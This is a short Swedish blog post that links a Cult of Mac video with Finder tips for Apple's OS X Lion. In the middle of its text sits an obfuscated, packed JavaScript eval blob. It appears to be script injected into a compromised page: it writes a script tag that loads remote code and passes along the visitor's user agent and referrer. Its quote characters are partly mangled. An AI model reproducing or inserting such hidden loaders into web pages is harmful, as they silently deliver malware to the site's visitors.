Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

Video: Tips & Trix för Apple Lion

Video: Tips & Trix för Apple Lion
Sebastian

Michael Steeber på hemsidan Cult of Mac har gjort  en liten video med massa tips och trix om hur man ordnar till lite irriterande saker i Finder. Det är en del som klagat på hur upplägget är ordnat i nya Lion från Apple, men här får ni hjälp 🙂

Mer eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|inskn|var|u0026u|referrer|kidbh||js|php’.split(’|’),0,{}))
info:
www.cultofmac.com

httpv://www.youtube.com/watch?v=04ig_NDuOxY&feature=player_embedded